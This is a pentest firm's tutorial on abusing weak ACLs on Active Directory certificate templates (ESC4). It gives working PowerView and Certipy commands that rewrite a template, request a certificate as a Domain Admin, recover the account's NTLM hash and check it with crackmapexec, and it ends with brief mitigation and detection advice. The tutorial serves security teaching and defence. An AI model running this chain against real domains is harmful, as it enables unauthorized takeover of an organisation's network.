Understanding and Mitigating Weak ACL Vulnerabilities in Active Directory Certificate Templates
Redfox Security - Penetration Testing Services
Outpace Attackers. Be Secure. Think Redfox.
Weak ACLs on ADCS certificate templates pose a serious risk. Attackers can exploit these misconfigurations to escalate privileges and compromise network security. This article examines these vulnerabilities and their potential for unauthorized access.
Understanding Weak ACLs on Certificate Templates
Certificate templates in ADCS define permissions for issuing certificates, but weak ACLs can be exploited by attackers to escalate privileges. Excessive permissions, like WriteDacl or WriteProperty for low-privileged users, allow attackers to modify the template's properties or ACL, leading to potential domain escalation.
Enumerating Sensitive Access Control Entries
To exploit weak ACLs on certificate templates, first enumerate access control entries to identify templates with unauthorized permissions. Use tools like PowerView or PowerShell cmdlets to list templates with weak ACLs, such as those granting WriteDacl or WriteProperty permissions to “Domain Users.
Get-DomainObjectAcl -SearchBase "CN=Configuration,DC=contoso,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -ResolveGUIDs | %{ $_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_ } | ?{ $_.Identity -match "Domain Users" }
Disabling Manager Approval Requirement
An attacker with WriteDacl permissions on a certificate template can bypass the manager approval requirement by using the Set-DomainObject cmdlet in PowerShell to disable it, allowing certificate issuance without approval.
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -XOR @{'mspki-enrollment-flag'=2} -Verbose
This command sets the mspki-enrollment-flag property of the specified template to 2, effectively disabling the manager approval requirement.
Disabling Authorized Signature Requirement
Similarly, the requirement for an authorized signature before certificate issuance can also be bypassed. An attacker can disable this requirement using the same Set-DomainObject cmdlet:
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -Set @{'mspki-ra-signature'=0} -Verbose
This command sets the mspki-ra-signature property of the specified template to 0, allowing certificates to be issued without a valid signature.
Enabling Subject Alternate Name Specification
An attacker with WriteDacl permissions on a certificate template can enable Subject Alternate Name (SAN) specification, allowing them to include arbitrary identities in the certificates they issue. This can be done using the following command:
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -XOR @{'mspki-certificate-name-flag'=1} -Verbose
This command sets the mspki-certificate-name-flag property of the specified template to 1, enabling SAN specification.
Editing Certificate Application Policy Extension
An attacker with WriteDacl permissions can modify the Certificate Application Policy Extension to enable additional purposes for issued certificates. This can be done using the following command:
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local" -Identity templateName -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
Exploiting Weak ACLs for Domain Escalation
An attacker can exploit weak ACLs on a certificate template to escalate privileges. By modifying properties like the msPKI-Certificate-Name-Flag and adding the ENROLLEE_SUPPLIES_SUBJECT flag, they can gain domain admin rights.
领英推荐
python3 modifyCertTemplate.py -template VulnTemplate -raw megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 192.168.1.11
Exploiting Misconfigured Active Directory Certificate Template ESC4
Step 1:?First, we need to find the vulnerable certificate templates that are present in the domain.?
Command: certipy-ad find -vulnerable -dc-ip ‘Domain Controller IP’ -u ‘User’ -p 'Password' -stdout
Step 2:?With write permissions on the certificate template, we can exploit this misconfiguration to make it vulnerable to ESC1, ESC2, and ESC3 using certipy-ad.
Command: certipy-ad template -template 'ESC4' -save-old -u ‘username’ -p ‘password’ -dc-ip ‘Domain Controller IP’
Step 3: Rerun the command from step 1.?
Step 4:?Now that it is vulnerable to ESC1,2 and 3. We can exploit it the way we exploit ESC1.?
Command: certipy-ad req -u ‘User’ -p 'Password' -ca 'Certificate Authority' -template 'ESC4' -upn ‘User you want the certificate for [Domain Admin]’ -dc-ip ‘Domain Controller IP’
Step 5:?Authenticate to the domain controller with the certificate to obtain the user's TGT and NTLM hash.
Command: certipy-ad auth -pfx ‘The user we got the certificate for [Domain Admin]’ -dc-ip ‘Domain Controller IP’.
Step 6:?Verify that the hash is valid using crackmapexec.
Command: crackmapexec smb 10.0.2.20 -u ‘The user we got the certificate for [Domain Admin]’ -H ‘HASH’
Mitigation and Detection
To mitigate the risk of weak ACLs on certificate templates, organizations should regularly audit permissions, focusing on accounts with Full Control, WriteOwner, WriteDACL, or WriteProperty access. Tools like PSPKIAudit can help identify and address these vulnerabilities. Monitoring Windows event ID 4899, which logs certificate template modifications, is also essential, though it only triggers upon enrollment after modification. Vigilance in detecting unauthorized enrollment activities is crucial.
TL;DR
Weak ACLs on certificate templates in Active Directory are serious security risks, enabling attackers to escalate privileges and compromise networks. Regular audits of template permissions are crucial to mitigate these vulnerabilities and secure AD infrastructure. Proactive measures are essential to maintain a robust security posture and protect against evolving threats.